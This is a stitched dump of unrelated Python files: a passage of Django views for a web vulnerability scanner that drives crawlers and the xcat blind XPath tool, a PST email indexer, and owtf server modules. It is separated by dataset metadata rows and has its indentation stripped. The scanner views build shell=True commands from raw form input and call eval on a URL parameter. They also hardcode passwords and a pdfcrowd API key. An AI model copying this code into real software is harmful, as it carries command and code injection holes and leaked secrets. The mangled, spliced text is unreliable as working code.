total['urls'] += project.get_no_of_urls_discovered()
total['processed'] += project.get_no_urls_processed()
total['vulns'] += project.get_vulnerabilities_found()
this_project = {}
this_project['count'] = count
this_project['name'] = project.project_name
this_project['status'] = project.status
this_project['urls'] = project.get_no_of_urls_discovered()
this_project['processed'] = project.get_no_urls_processed()
this_project['vulns'] = project.get_vulnerabilities_found()
project_wise.append(this_project)
if total['urls']:
total['percentage'] = total['processed'] * 100 / total['urls']
progess = {
'total': total,
'projects': project_wise
}
return progess
except:
return "error"
def tour(request):
try:
return render_to_response("tour.html", {
}, context_instance=RequestContext(request))
except:
return "error"
def progress(request):
try:
return render_to_response("progress.html", {
'progress': get_progress()
}, context_instance=RequestContext(request))
except:
return "error"
def new_scans(request):
return render_to_response("scans.html", {
'page': 'new_scan',
'settings': get_renderable_settings()
}, context_instance=RequestContext(request))
def xml_inj(request):
#try:
progress = get_progress()
return render_to_response("xml_inj_overview.html", {
'page': 'xml_overview',
'progress': get_progress()
}, context_instance=RequestContext(request))
#except:
#return "error"
def new_scan(request):
if True:
if request.method == "POST":
try:
settings = get_new_settings(request)
except:
settings = get_settings()
queueName="-1"
project_name = str(request.POST['projectName'])
start_url = str(request.POST['startURL'])
query_url = str(request.POST['startURL'])
login_url = str(request.POST['loginURL'])
logout_url = str(request.POST['logoutURL'])
username_field=str(request.POST['toAuthUsernameField'])
username=str(request.POST['toAuthUsername'])
password_field=str(request.POST['toAuthPasswordField'])
password=str(request.POST['toAuthPassword'])
auth_parameters=str(request.POST['authParameters'])
redisIP=str(request.POST['redisIP'])
if (request.POST['queueName']):
queueName=str(request.POST['queueName'])
if Project.objects.filter(project_name = project_name).count():
lol = True
else:
lol = False
if not project_name or not start_url or not query_url or lol:
return render_to_response("new.html", {
'success': 'False',
'settings': get_renderable_settings()
}, context_instance=RequestContext(request))
else:
project = Project()
project.project_name = project_name
project.start_url = start_url
project.query_url = query_url
project.login_url = login_url
project.logout_url = logout_url
project.allowed_extensions = str(settings['allowed_extensions'])
project.allowed_protocols = str(settings['allowed_protocols'])
project.consider_only = str(settings['consider_only'])
project.exclude_fields = str(settings['exclude'])
project.username = username
project.password = password
project.auth_mode = str(settings['auth_mode'])
project.username_field=username_field
project.password_field=password_field
project.auth_parameters=auth_parameters
project.queueName=queueName
project.redisIP=redisIP
project.status = IN_PROGRESS
project.save()
if 'remember' in request.POST and len(str(request.POST['remember'])):
save_settings(settings)
cmd_str = project_name
log_file = open(project_name+'.txt', 'w')
RUN_CRAWLER_FILE = os.path.join(SITE_ROOT, 'run_crawler.py')
if sys.platform.startswith('win32'):
process = subprocess.Popen('python "%s" "%s"' %(RUN_CRAWLER_FILE, cmd_str),shell=True,
stdout = log_file,
stderr = log_file,
stdin = subprocess.PIPE)
else:
process = subprocess.Popen('exec python2 "%s" "%s"' %(RUN_CRAWLER_FILE, cmd_str),
shell=True,
stdout = log_file,
stderr = log_file,
stdin = subprocess.PIPE)
CRAWLERS[project_name] = process
return HttpResponseRedirect("/details?proj_name=%s&just=true" % (project_name))
else:
return render_to_response("new.html", {
'page': 'new_scan',
'settings': get_renderable_settings()
}, context_instance=RequestContext(request))
def settings(request):
try:
if request.method == "GET":
return render_to_response("settings.html", {
'page': 'settings',
'settings': get_renderable_settings()
}, context_instance=RequestContext(request))
elif request.method == "POST":
save_settings(get_new_settings(request))
return render_to_response("settings.html", {
'page': 'settings',
'settings': get_renderable_settings(),
'updated': True
}, context_instance=RequestContext(request))
except:
return "error"
def get_new_settings(request):
try:
a = {}
a['consider_only'] = []
for i in request.POST.getlist('toConsider[]'):
a['consider_only'].append(str(i.strip()))
a['exclude'] = []
for i in str(request.POST['toExclude']).split(','):
a['exclude'].append(str(i.strip()))
a['allowed_extensions'] = []
for i in str(request.POST['allowedExtensions']).split(','):
a['allowed_extensions'].append(str(i.strip()))
a['allowed_protocols'] = []
for i in request.POST.getlist('allowedProtocols[]'):
a['allowed_protocols'].append(str(i.strip()))
a['username'] = []
a['username'] = request.POST['toAuthUsername']
a['password'] = []
a['password'] = request.POST['toAuthPassword']
a['auth_mode'] = []
a['auth_mode'] = request.POST['toAuthMode']
return a
except:
return "error"
def get_renderable_settings(settings = None):
try:
if not settings:
#print('inside if')
settings = get_settings()
settings['allowed_extensions'] = ', '.join(settings['allowed_extensions'])
settings['exclude'] = ', '.join(settings['exclude'])
#settings['username'] = ', '.join(settings['username'])
#settings['password'] = ', '.join(settings['password'])
#settings['auth_mode'] = ', '.join(settings['auth_mode'])
return settings
except:
return "error"
def get_settings():
try:
if Settings.objects.all():
setting = Settings.objects.get(pk=1)
else:
setting = Settings()
setting.allowed_extensions = "['asp', 'aspx', 'cfm', 'cfml', 'htm', 'html', 'jhtml', 'jsp', 'php', 'php3', 'php4', 'php5', 'phtm', 'phtml', 'pl', 'py', 'shtm', 'shtml', 'txt', 'xht', 'xhtm', 'xhtml', 'xml']"
setting.allowed_protocols = "['http', 'https']"
setting.consider_only = "['textareas', 'checkboxes', 'selects', 'inputs']"
setting.exclude_fields = "['csrftoken', 'csrfmiddlewaretoken']"
setting.username = "nushafreen"
setting.password = "nushafreen"
setting.auth_mode = "Q8fZUKGdyX7zMOkiJfisR2ae26xcWaYs"
setting.save()
b = {}
b['allowed_extensions'] = eval(str(setting.allowed_extensions))
b['allowed_protocols'] = eval(str(setting.allowed_protocols))
b['consider_only'] = eval(str(setting.consider_only))
b['exclude'] = eval(str(setting.exclude_fields))
b['username'] = setting.username
b['password'] = setting.password
b['auth_mode'] = setting.auth_mode
return b
except:
return "error"
def save_settings(new_settings):
try:
settings = get_settings()
update = False
for i in settings:
if sorted(settings[i]) != sorted(new_settings[i]):
update = True
settings[i] = new_settings[i]
if update:
setting = Settings.objects.get(pk=1)
setting.allowed_extensions = str(new_settings['allowed_extensions'])
setting.allowed_protocols = str(new_settings['allowed_protocols'])
setting.consider_only = str(new_settings['consider_only'])
setting.exclude_fields = str(new_settings['exclude'])
setting.username = str(new_settings['username'])
setting.password = str(new_settings['password'])
setting.auth_mode = str(new_settings['auth_mode'])
setting.save()
except:
update=False
# def add_new_crawler(request):
# PROJECT_NAME = 'Xtreme1%d' % (random.randint(100, 20000))
# START_URL = 'http://localhost:9090/'
# cmd_line_string = PROJECT_NAME + '$$$' + START_URL
# log_file = open(PROJECT_NAME+'.txt', 'w')
# process = subprocess.Popen('python "%s"' %(RUN_CRAWLER_FILE), shell=True, stdout = log_file, stderr = log_file, stdin = subprocess.PIPE)
# process.stdin.write(cmd_line_string)
# out, err = process.communicate(cmd_line_string)
# process.stdin.close()
# CRAWLERS.append(PROJECT_NAME)
# length = len(CRAWLERS)
# return HttpResponse(str(length) + 'lol check' + cmd_line_string)
def kill_scan(request):
#print("inside kill scan")
try:
lol = False
try:
project_name = str(request.GET['project_name'])
#print("project_name")
#print(project_name)
if not len(project_name):
lol = True
except:
lol = True
if lol:
return render_to_response('alert.html', {
'error': True,
'text': 'Missing Parameter!'
}, context_instance=RequestContext(request))
#print(CRAWLERS)
if project_name in CRAWLERS:
pro = CRAWLERS[project_name]
#print('process id in kill')
#print(pro.pid)
#print(signal.SIGTERM)
#os.kill(pro.pid, signal.SIGTERM)
pro.kill()
CRAWLERS.pop(project_name)
project = Project.objects.get(project_name = project_name)
project.status = STOPPED
project.save()
return render_to_response('alert.html', {
'error': False,
'text': 'Successfully stopped project scanning'
}, context_instance=RequestContext(request))
else:
return render_to_response('alert.html', {
'error': True,
'text': 'The project scanning is already stopped!'
}, context_instance=RequestContext(request))
except:
return "error"
def get_details(request):
# try:
if True :
get_progress()
if 'proj_name' in request.GET and len(str(request.GET['proj_name'])):
project_name = str(request.GET['proj_name'])
if Project.objects.filter(project_name = project_name).count():
#projectss = Project.objects.filter(project_name__contains= project_name)
project = Project.objects.get(project_name = project_name)
setting = {}
setting['allowed_extensions'] = eval(str(project.allowed_extensions))
setting['allowed_protocols'] = eval(str(project.allowed_protocols))
setting['consider_only'] = eval(str(project.consider_only))
setting['exclude'] = eval(str(project.exclude_fields))
setting['username'] = project.username
setting['password'] = project.password
setting['auth_mode'] = project.auth_mode
a = get_renderable_settings(setting)
a['allowed_protocols'] = ', '.join(a['allowed_protocols'])
a['consider_only'] = ', '.join(a['consider_only'])
urls_found = project.get_no_of_urls_discovered()
urls_processed = project.get_no_urls_processed()
vulns_found = project.get_vulnerabilities_found()
percentage = 0
if urls_found>0:
percentage = urls_processed * 100/urls_found
if 'just' in request.GET and str(request.GET['just']) == 'true':
just = True
else:
just = False
if 'update' in request.GET and str(request.GET['update']) =='1':
template = 'details_update.html'
else:
template = 'details.html'
return render_to_response(template, {
'project': project,
'settings': a,
'page': 'reports',
'urls_found': urls_found,
'urls_processed': urls_processed,
'vulns_found': vulns_found,
'percentage': percentage,
'just': just
}, context_instance=RequestContext(request))
return render_to_response('alert.html', {
'error': True,
'text': 'Your search didn\'t give any results. Please check the overview section for your project.'
}, context_instance=RequestContext(request))
#except:
#return "error"
def blind_scan(request):
if request.method == "POST":
project_name = request.POST['projectName']
public_IP = request.POST['publicIP']
blind_URL = request.POST['blindURL']
method = request.POST['method']
param_name = request.POST['paramName']
param_value = request.POST['paramValue']
match_string = request.POST['matchString']
#create project blind and save to db
blind_proj = BlindProject()
blind_proj.project_name = project_name
blind_proj.public_IP = public_IP
blind_proj.method = method
blind_proj.blind_URL = blind_URL
blind_proj.param_name = param_name
blind_proj.param_value = param_value
blind_proj.match_string = match_string
blind_proj.project_status = 'In Progress'
blind_proj.success_flg = 'N'
blind_proj.save()
log_file = open(project_name + '_blindLog.txt', 'a')
process = subprocess.Popen('xcat --public-ip=' + public_IP + ' --method=' + method + ' ' + blind_URL + ' "' + param_name + '=' + param_value + '" ' + param_name + ' "' + match_string + '" run retrieve', shell=True, stdout = log_file, stderr = log_file, stdin = subprocess.PIPE)
process_id = process.pid
return HttpResponseRedirect("/blind_details?projectName=%s&page='blind_scan'&processID=%s" % (project_name,process_id))
else:
return render_to_response("blind.html", {
'page': 'blind_scan',
}, context_instance=RequestContext(request))
def blind_details(request):
project_name = request.GET['projectName']
if 'processID' in request.GET:
process_id = eval(request.GET['processID'])
project = BlindProject.objects.get(project_name = project_name)
#project = request.POST['project']
p = psutil.Process(process_id)
print(p.status)
#process has terminated, check log for result of xpath scan
if(p.status!='sleeping' and p.status!='running'):
line = subprocess.check_output(['tail', '-1', project_name + '_blindLog.txt'])
if 'Successfully retrieved XML' in line:
BlindProject.objects.filter(project_name =
project_name).update(project_status = 'Completed',success_flg='T')
else:
BlindProject.objects.filter(project_name =
project_name).update(project_status = 'Completed',success_flg='F')
return render_to_response('blind_details.html', {
'page': 'blind_details',
'project': BlindProject.objects.get(project_name = project_name),
'processID': process_id,
}, context_instance=RequestContext(request))
else:
return render_to_response('blind_details.html', {
'page': 'blind_details',
'project': BlindProject.objects.get(project_name = project_name),
}, context_instance=RequestContext(request))
def blind_report(request):
if 'projectName' in request.GET and len(request.GET['projectName']):
project_name = request.GET['projectName']
project =BlindProject.objects.get(project_name = project_name)
report_lines = []
with open(project_name+'_blindLog.txt', 'r') as f:
for line in f.readlines():
report_lines.append(str(line))
return render_to_response("blind_report.html", {
'page' : 'blind_report',
'project' : project,
'reportLines' : report_lines,
}, context_instance=RequestContext(request))
else:
projects = BlindProject.objects.all()
proj = []
for project in projects:
if project.project_status == 'Completed':
proj.append(project.project_name)
return render_to_response('blind_report.html', {
'page': 'blind_report',
'projectnames':proj,
}, context_instance=RequestContext(request))
def resume_scan(request):
try:
got_option = False
try:
if 'projectName' in request.GET and len(request.GET['projectName']):
got_option = True
project_name = request.GET['projectName']
except:
return HttpResponseRedirect('/resume')
if got_option:
try:
project = Project.objects.get(project_name = project_name)
except:
project = None
a = []
if not project:
error = True
else:
error = False
project = Project.objects.get(project_name = project_name)
setting = {}
setting['allowed_extensions'] = eval(str(project.allowed_extensions))
setting['allowed_protocols'] = eval(str(project.allowed_protocols))
setting['consider_only'] = eval(str(project.consider_only))
setting['exclude'] = eval(str(project.exclude_fields))
a = get_renderable_settings(setting)
a['allowed_protocols'] = ', '.join(a['allowed_protocols'])
a['consider_only'] = ', '.join(a['consider_only'])
return render_to_response('resume.html', {
'page': 'resume_scan',
'details': a,
'project':project,
'error': error,
}, context_instance=RequestContext(request))
projects = Project.objects.all()
proj = []
for project in projects:
if project.status != IN_PROGRESS:
proj.append(str(project.project_name))
return render_to_response('resume.html', {
'page': 'resume_scan',
'projects':proj,
}, context_instance=RequestContext(request))
except:
return "error"
def modify_scan(request):
#try:
if request.method == "POST":
try:
settings = get_new_settings(request)
except:
settings = get_settings()
project_name = str(request.POST['projectName'])
start_url = str(request.POST['startURL'])
query_url = str(request.POST['startURL'])
login_url = str(request.POST['loginURL'])
logout_url = str(request.POST['logoutURL'])
username_field=str(request.POST['toAuthUsernameField'])
username=str(request.POST['toAuthUsername'])
password_field=str(request.POST['toAuthPasswordField'])
password=str(request.POST['toAuthPassword'])
auth_parameters=str(request.POST['authParameters'])
auth_mode=str(request.POST['toAuthMode'])
if Project.objects.filter(project_name = project_name).count() == 1:
lol = True
else:
lol = False
if not project_name or not start_url or not query_url or not lol:
return render_to_response('alert.html', {
'error': True,
'text': 'Nice Try!'
}, context_instance=RequestContext(request))
else:
Project.objects.filter(project_name =
project_name).update(status = IN_PROGRESS,
start_url = start_url,
query_url = query_url,
login_url = login_url,
logout_url = logout_url,
allowed_extensions = str(settings['allowed_extensions']),
allowed_protocols = str(settings['allowed_protocols']),
consider_only = str(settings['consider_only']),
exclude_fields = str(settings['exclude']),
username = username,
password = password,
auth_mode = auth_mode,
username_field = username_field,
password_field = password_field,
auth_parameters = auth_parameters)
project = Project.objects.get(project_name = project_name)
# Did the user ask us to remember the settings?
if 'remember' in request.POST and len(str(request.POST['remember'])):
save_settings(settings)
if 'force' in request.POST and len(str(request.POST['force'])):
print 'forcing'
Page.objects.filter(project = project).delete()
Form.objects.filter(project = project).delete()
if Page.objects.filter(URL = start_url, project = project).count():
Page.objects.filter(URL = start_url, project = project).delete()
Form.objects.filter(form_found_on = start_url, project = project).delete()
cmd_str = project_name
log_file = open(project_name+'.txt', 'a')
process = subprocess.Popen('python "%s" "%s"' %(RUN_CRAWLER_FILE, cmd_str),
shell=True,
stdout = log_file,
stderr = log_file,
stdin = subprocess.PIPE)
CRAWLERS[project_name] = process
return HttpResponseRedirect("/details?proj_name=%s&mod=True" % (project_name))
else:
return HttpResponseRedirect('/')
# except:
#return "error"
def display_reports(request):
try:
got_option = False
try:
if 'projectName' in request.GET and len(request.GET['projectName']):
got_option = True
project_name = request.GET['projectName']
except:
return HttpResponseRedirect('/reports')
if got_option:
try:
project = Project.objects.get(project_name = project_name)
except:
project = None
det = []
if not project:
error = True
else:
error = False
#with open(project_name+'.txt', 'r') as f:
# det = parse_reports(f.readlines())
project = Project.objects.get(project_name = project_name)
setting = {}
setting['allowed_extensions'] = eval(str(project.allowed_extensions))
setting['allowed_protocols'] = eval(str(project.allowed_protocols))
setting['consider_only'] = eval(str(project.consider_only))
setting['exclude'] = eval(str(project.exclude_fields))
setting['username'] = project.username
setting['password'] = project.password
setting['auth_mode'] = project.auth_mode
a = get_renderable_settings(setting)
a['allowed_protocols'] = ', '.join(a['allowed_protocols'])
a['consider_only'] = ', '.join(a['consider_only'])
urls_found = project.get_no_of_urls_discovered()
urls_processed = project.get_no_urls_processed()
vulns_found = project.get_vulnerabilities_found()
return render_to_response('reports.html', {
'option_given': True,
'page': 'reports',
#'details': det,
'project': project,
'settings': a,
'vulns': get_parsed_vulns(project_name),
'urls_found': urls_found,
'urls_processed': urls_processed,
'vulns_found': vulns_found,
'error': error,
'counters':get_counters(),
'list_vul':List_vuln,
'report_string':Report_string,
'vul_forms':get_vulnerebleForms(),
}, context_instance=RequestContext(request))
projects = Project.objects.all()
proj = []
for project in projects:
if project.status != IN_PROGRESS:
proj.append(str(project.project_name))
return render_to_response('reports.html', {
'page': 'reports',
'projects':proj,
}, context_instance=RequestContext(request))
except:
return "error"
def generate_pdf_view(request):
try:
"""
try:
# create an API client instance
client = pdfcrowd.Client("nushafreen", "1a1dd7a47f7506742c64a949e9a108f7")
print(request.GET)
if 'projectName' in request.GET and len(request.GET['projectName']):
got_option = True
project_name = request.GET['projectName']
# convert a web page and store the generated PDF to a variable
#pdf = client.convertURI("/reports?projectName=%s" %(project_name))
output_file = open('%s/XtremeWebAPP/%s.pdf' %(MANAGE_FILE_FOLDER,str(project_name)), 'wb')
client.convertFile('%s/XtremeWebAPP/%s_report.html' %(MANAGE_FILE_FOLDER,str(project_name)), output_file)
output_file.close()
# set HTTP response headers
response = HttpResponse(mimetype="application/pdf")
response["Cache-Control"] = "max-age=0"
response["Accept-Ranges"] = "none"
response["Content-Disposition"] = "attachment; filename=%s/XtremeWebAPP/%s.pdf" %(MANAGE_FILE_FOLDER,str(project_name))
# send the generated PDF
#response.write(pdf)
response.write(output_file)
except pdfcrowd.Error, why:
response = HttpResponse(mimetype="text/plain")
response.write(why)
return response
"""
if 'projectName' in request.GET and len(request.GET['projectName']):
project_name = request.GET['projectName']
#pdfkit.from_file('%s/XtremeWebAPP/%s_report.txt' %(MANAGE_FILE_FOLDER,str(project_name)), '%s/XtremeWebAPP/%s.pdf' %(MANAGE_FILE_FOLDER,str(project_name)))
#subprocess.check_call('enscript %s/XtremeWebAPP/%s_report.txt -o - | ps2pdf - %s/XtremeWebAPP/%s.pdf' %(MANAGE_FILE_FOLDER,str(project_name),MANAGE_FILE_FOLDER,str(project_name)) , shell=True)
return render_to_response('generatedpdf.html', {
'project_name':str(project_name)
}, context_instance=RequestContext(request))
except:
return "error"
def parse_reports(report_lines):
try :
parsed_report = []
for line in report_lines:
a = {}
timestamp, remaining = line.split(' - ', 1)
a['timestamp'] = timestamp.strip()[1:-1]
msg_type, msg = remaining.split(':', 1)
a['msg_type'] = msg_type.strip()
a['msg'] = msg.strip()
parsed_report.append(a)
return parsed_report
except:
return "error"
def get_parsed_vulns(project_name):
try:
#global COUNTERS
#COUNTERS={}
#global details={}
# global urll={}
#global msg={}
#timestamp={}
global Form_list
Form_list=[]
i=0
count=0
while i <Len_List_vect :
COUNTERS[List_vuln[i]]=count
details[List_vuln[i]]="Details :\n"
urll[List_vuln[i]]="Urls : \n"
msg[List_vuln[i]]=""
timestamp[List_vuln[i]]=""
i+=1
#print "counters are "+str(COUNTERS)
i=0
vulns = Vulnerability.objects.filter(project = project_name) #returns all rows,in form of dictionary i.e key and value
vulnsList=[]
for vuln in vulns:
flg=0
for v in vulnsList:
if v.url == vuln.url and v.form.input_field_list == vuln.form.input_field_list and v.re_attack == vuln.re_attack and v.auth!=vuln.auth:
flg=1
break
if flg==0:
vulnsList.append(vuln)
#vulnsList.sort()
for v_stored in vulnsList:
for v in List_vuln :
#print("message is " + v_stored.msg_type)
if v_stored.msg_type == v :
COUNTERS[v]+=1
details[v]=""+str(details[v])+"\n Description : "+str(v_stored.msg_type)+"\n\n"+"URL : "+str(v_stored.url)+"\n\n"+"Form name : "+str(v_stored.form.form_name)+"\nMethod : "+str(v_stored.form.form_method)+"\nAction : "+str(v_stored.form.form_action)+"\n\n"+"Malicious Query : \n"+str(v_stored.details)+"\n"
details[v]=""+str(details[v])+"--------------------------------------------------------------------------------------------------------------------"
urll[v]=str(urll[v])+"\n"+str(v_stored.url)+"\n"
timestamp[v]=str(timestamp[v])+"\n"+str(v_stored.timestamp)+"\n"
#print v_stored.timestamp
msg[v]=str(msg[v])+"\n"+str(v_stored.msg)+"\n"
Forms.append("\n URL : "+str(v_stored.url)+" \n Form name : "+str(v_stored.form.form_name)+"\nMethod : "+str(v_stored.form.form_method)+"\nAction: "+str(v_stored.form.form_action)+"\n")
for f in Forms:
flg=0
for ff in Form_list:
if ff ==f :
flg=1
break
if flg==0:
Form_list.append(f)
Form_list.append("--------------------------------------------------------------------------------------------------------------------")
vulnsList.sort()
#Forms=Form_list
print (Form_list)
return vulnsList
except:
return "error"
def get_counters():
try:
i=1
temp={}
global Report_string
Report_string=""
links_data=""
vul_counter=[]
for line in COUNTERS:
#print(line)
#print(str(COUNTERS[line]))
a = {}
a['vul_type'] =str(line)
a['counter_var']=0
if COUNTERS[line] > 0 :
links_data="<a href=#! onclick=get_details('"+str(i)+"'); style=text-decoretion:none>"+str(COUNTERS[line])+"</a>"
other_data=str(details[line])
urls=str(urll[line])
#print links_data
a['vul_no'] =links_data
a['other_details']=str(other_data)
else :
a['vul_no'] = str(COUNTERS[line])
i+=1
a['counter_var']+=i
vul_counter.append(a)
Report_string+="<tr><td>"+str(timestamp[line])+"</td><td>"+str(line)+"</td><td>"+str(COUNTERS[line])+"</td><td>"+str(details[line])+"</td></tr>"
#Report_string.append(a)
Report_string+="</table>"
#print("hello "+Report_string)
#vul_counter.sort()
return vul_counter
except:
print "error occured myan "
return "error"
def get_counterss():
try:
vul_counter=[]
for l in List_vuln :
if l in COUNTERS :
strr=str(l)+" " + str(COUNTERS[l])
vul_counter.append(strr)
return vul_counter
except:
return "error"
def get_vulnerebleForms():
try:
return Form_list
except:
return "error"
def disp404(request):
try :
return render_to_response('alert.html', {
'error': True,
'text': 'The page you are looking for is not found! Please help us write it for you by letting us know how you arrived here!'
}, context_instance=RequestContext(request))
except:
return ""
def scripts(request):
try :
data="a"
with open(css_folder_file1, 'r') as f:
#print(f.readlines())
data=f.read()
with open(css_folder_file2, 'r') as f:
#print(f.readlines())
data=data+f.read().replace('\n', '')
if request.method == "GET":
# print("page content is "+str(request.GET['content']))
#with open(css_folder_file2, 'r') as f:
#print(f.readlines())
#data=data+f.read().replace('\n', '')
#os.makedirs(directory)
return render_to_response("script.html", {
'page': 'settings',
'method_id': str(request.GET['method_id']),
'content':str(request.GET['content']),
'data':data
}, context_instance=RequestContext(request))
elif request.method == "POST":
#save_settings(get_new_settings(request))
return render_to_response("script.html", {
'page': 'settings',
'updated': True,
'method_id': str(request.GET['method_id']),
'content':str(request.GET['content']),
'data':data
}, context_instance=RequestContext(request))
except:
print ("some error ")
return "error"
| 34.328571 | 325 | 0.555918 |
cybersecurity-penetration-testing | import os
import sys
import argparse
import logging
import jinja2
import pypff
import unicodecsv as csv
from collections import Counter
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts handles processing and output of PST Email Containers'
output_directory = ""
date_dict = {x:0 for x in xrange(1, 25)}
date_list = [date_dict.copy() for x in xrange(7)]
def main(pst_file, report_name):
"""
The main function opens a PST and calls functions to parse and report data from the PST
:param pst_file: A string representing the path to the PST file to analyze
:param report_name: Name of the report title (if supplied by the user)
:return: None
"""
logging.debug("Opening PST for processing...")
pst_name = os.path.split(pst_file)[1]
opst = pypff.open(pst_file)
root = opst.get_root_folder()
logging.debug("Starting traverse of PST structure...")
folderTraverse(root)
logging.debug("Generating Reports...")
top_word_list = wordStats()
top_sender_list = senderReport()
dateReport()
HTMLReport(report_name, pst_name, top_word_list, top_sender_list)
def makePath(file_name):
"""
The makePath function provides an absolute path between the output_directory and a file
:param file_name: A string representing a file name
:return: A string representing the path to a specified file
"""
return os.path.abspath(os.path.join(output_directory, file_name))
def folderTraverse(base):
"""
The folderTraverse function walks through the base of the folder and scans for sub-folders and messages
:param base: Base folder to scan for new items within the folder.
:return: None
"""
for folder in base.sub_folders:
if folder.number_of_sub_folders:
folderTraverse(folder) # Call new folder to traverse:
checkForMessages(folder)
def checkForMessages(folder):
"""
The checkForMessages function reads folder messages if present and passes them to the report function
:param folder: pypff.Folder object
:return: None
"""
logging.debug("Processing Folder: " + folder.name)
message_list = []
for message in folder.sub_messages:
message_dict = processMessage(message)
message_list.append(message_dict)
folderReport(message_list, folder.name)
def processMessage(message):
"""
The processMessage function processes multi-field messages to simplify collection of information
:param message: pypff.Message object
:return: A dictionary with message fields (values) and their data (keys)
"""
return {
"subject": message.subject,
"sender": message.sender_name,
"header": message.transport_headers,
"body": message.plain_text_body,
"creation_time": message.creation_time,
"submit_time": message.client_submit_time,
"delivery_time": message.delivery_time,
"attachment_count": message.number_of_attachments,
}
def folderReport(message_list, folder_name):
"""
The folderReport function generates a report per PST folder
:param message_list: A list of messages discovered during scans
:folder_name: The name of an Outlook folder within a PST
:return: None
"""
if not len(message_list):
logging.warning("Empty message not processed")
return
# CSV Report
fout_path = makePath("folder_report_" + folder_name + ".csv")
fout = open(fout_path, 'wb')
header = ['creation_time', 'submit_time', 'delivery_time',
'sender', 'subject', 'attachment_count']
csv_fout = csv.DictWriter(fout, fieldnames=header, extrasaction='ignore')
csv_fout.writeheader()
csv_fout.writerows(message_list)
fout.close()
# HTML Report Prep
global date_list # Allow access to edit global variable
body_out = open(makePath("message_body.txt"), 'a')
senders_out = open(makePath("senders_names.txt"), 'a')
for m in message_list:
if m['body']:
body_out.write(m['body'] + "\n\n")
if m['sender']:
senders_out.write(m['sender'] + '\n')
# Creation Time
day_of_week = m['creation_time'].weekday()
hour_of_day = m['creation_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
# Submit Time
day_of_week = m['submit_time'].weekday()
hour_of_day = m['submit_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
# Delivery Time
day_of_week = m['delivery_time'].weekday()
hour_of_day = m['delivery_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
body_out.close()
senders_out.close()
def wordStats(raw_file="message_body.txt"):
"""
The wordStats function reads and counts words from a file
:param raw_file: The path to a file to read
:return: A list of word frequency counts
"""
word_list = Counter()
for line in open(makePath(raw_file), 'r').readlines():
for word in line.split():
# Prevent too many false positives/common words
if word.isalnum() and len(word) > 4:
word_list[word] += 1
return wordReport(word_list)
def wordReport(word_list):
"""
The wordReport function counts a list of words and returns results in a CSV format
:param word_list: A list of words to iterate through
:return: None or html_report_list, a list of word frequency counts
"""
if not word_list:
logging.debug('Message body statistics not available')
return
fout = open(makePath("frequent_words.csv"), 'wb')
fout.write("Count,Word\n")
for e in word_list.most_common():
if len(e) > 1:
fout.write(str(e[1]) + "," + str(e[0]) + "\n")
fout.close()
html_report_list = []
for e in word_list.most_common(10):
html_report_list.append({"word": str(e[0]), "count": str(e[1])})
return html_report_list
def senderReport(raw_file="senders_names.txt"):
"""
The senderReport function reports the most frequent_senders
:param raw_file: The file to read raw information
:return: html_report_list, a list of the most frequent senders
"""
sender_list = Counter(open(makePath(raw_file), 'r').readlines())
fout = open(makePath("frequent_senders.csv"), 'wb')
fout.write("Count,Sender\n")
for e in sender_list.most_common():
if len(e) > 1:
fout.write(str(e[1]) + "," + str(e[0]))
fout.close()
html_report_list = []
for e in sender_list.most_common(5):
html_report_list.append({"label": str(e[0]), "count": str(e[1])})
return html_report_list
def dateReport():
"""
The dateReport function writes date information in a TSV report. No input args as the filename
is static within the HTML dashboard
:return: None
"""
csv_out = open(makePath("heatmap.tsv"), 'w')
csv_out.write("day\thour\tvalue\n")
for date, hours_list in enumerate(date_list):
for hour, count in hours_list.items():
to_write = str(date+1) + "\t" + str(hour) + "\t" + str(count) + "\n"
csv_out.write(to_write)
csv_out.flush()
csv_out.close()
def HTMLReport(report_title, pst_name, top_words, top_senders):
"""
The HTMLReport function generates the HTML report from a Jinja2 Template
:param report_title: A string representing the title of the report
:param pst_name: A string representing the file name of the PST
:param top_words: A list of the top 10 words
:param top_senders: A list of the top 10 senders
:return: None
"""
open_template = open("stats_template.html", 'r').read()
html_template = jinja2.Template(open_template)
context = {"report_title": report_title, "pst_name": pst_name,
"word_frequency": top_words, "percentage_by_sender": top_senders}
new_html = html_template.render(context)
html_report_file = open(makePath(report_title+".html"), 'w')
html_report_file.write(new_html)
html_report_file.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('PST_FILE', help="PST File Format from Microsoft Outlook")
parser.add_argument('OUTPUT_DIR', help="Directory of output for temporary and report files.")
parser.add_argument('--title', help='Title of the HTML Report. (default=PST Report)',
default="PST Report")
parser.add_argument('-l', help='File path of log file.')
args = parser.parse_args()
output_directory = os.path.abspath(args.OUTPUT_DIR)
if not os.path.exists(output_directory):
os.makedirs(output_directory)
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l)
log_path = os.path.join(args.l, 'pst_indexer.log')
else:
log_path = 'pst_indexer.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
logging.info('Starting PST_Indexer v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
logging.info('Starting Script...')
main(args.PST_FILE, args.title)
logging.info('Script Complete')
| 33.761905 | 107 | 0.64011 |
owtf | """
owtf.files.main
~~~~~~~~~~~~~~~
"""
import logging
import tornado
import tornado.httpserver
import tornado.ioloop
import tornado.options
from owtf.files.routes import HANDLERS
from owtf.settings import FILE_SERVER_LOG, FILE_SERVER_PORT, SERVER_ADDR, TEMPLATES
from owtf.utils.app import Application
__all__ = ["start_file_server"]
class FileServer():
def start(self):
try:
self.application = Application(handlers=HANDLERS, template_path=TEMPLATES, debug=False, gzip=True)
self.server = tornado.httpserver.HTTPServer(self.application)
self.server.bind(int(FILE_SERVER_PORT), address=SERVER_ADDR)
tornado.options.parse_command_line(
args=["dummy_arg", "--log_file_prefix={}".format(FILE_SERVER_LOG), "--logging=info"]
)
self.server.start()
except Exception as e:
logging.error(e)
def start_file_server():
file_server = FileServer()
file_server.start()
| 25.783784 | 110 | 0.654545 |
owtf | """
owtf.managers.transaction
~~~~~~~~~~~~~~~~~~~~~~~~~
The DB stores HTTP transactions, unique URLs and more.
"""
import base64
from collections import defaultdict
import json
import logging
import re
from hrt.interface import HttpRequestTranslator
from sqlalchemy import asc, desc
from owtf.config import config_handler
